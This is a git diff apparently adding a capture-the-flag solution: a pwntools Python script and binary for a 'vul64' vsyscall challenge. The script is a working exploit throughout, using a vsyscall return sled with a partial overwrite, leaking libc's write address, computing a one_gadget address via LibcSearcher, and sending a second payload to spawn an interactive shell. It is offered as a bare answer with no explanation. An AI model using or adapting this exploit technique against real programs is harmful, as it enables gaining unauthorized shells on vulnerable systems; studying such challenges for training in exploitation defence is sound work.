diff --git a/vsyscall/vul64/answer.py b/vsyscall/vul64/answer.py
new file mode 100644
index 0000000..298c1e1
--- /dev/null
+++ b/vsyscall/vul64/answer.py
@@ -0,0 +1,34 @@
+#!/usr/bin/python2
+# -*- coding:utf-8 -*-
+
+from pwn import *
+from LibcSearcher import *
+import os
+import time
+import struct
+context(arch = "amd64",os = "linux", log_level = "debug")
+
+# context.log_level = "debug"
+p = process('./vul64')
+elf = ELF('./vul64')
+
+#gdb.attach(p, "break *0x0000555555554a2b")
+
+#time.sleep(10)
+ret_addr = 0xffffffffff600400
+
+with open('input.txt', 'w') as f:
+    f.write(p64(ret_addr) * 30 + '\x2c')
+
+p.send(p64(ret_addr) * 30 + '\x2c')
+p.recvuntil("I have a gift for yoooou\n")
+write_libc = u64(p.recv(8))
+p.recvuntil("Want my flag? Keep going!\n")
+
+libc = LibcSearcher('write', write_libc)
+libc_base = write_libc - libc.dump('write')
+system_libc = libc_base + 0x4f3d5 # one_gadget Shift
+
+
+p.send("/bin/sh\x00" + '0' * 0x2f + p32(0x44) + p64(system_libc)  + '\n')
+p.interactive()
diff --git a/vsyscall/vul64/vul64 b/vsyscall/vul64/vul64
new file mode 100755
index 0000000..8f0a22d
Binary files /dev/null and b/vsyscall/vul64/vul64 differ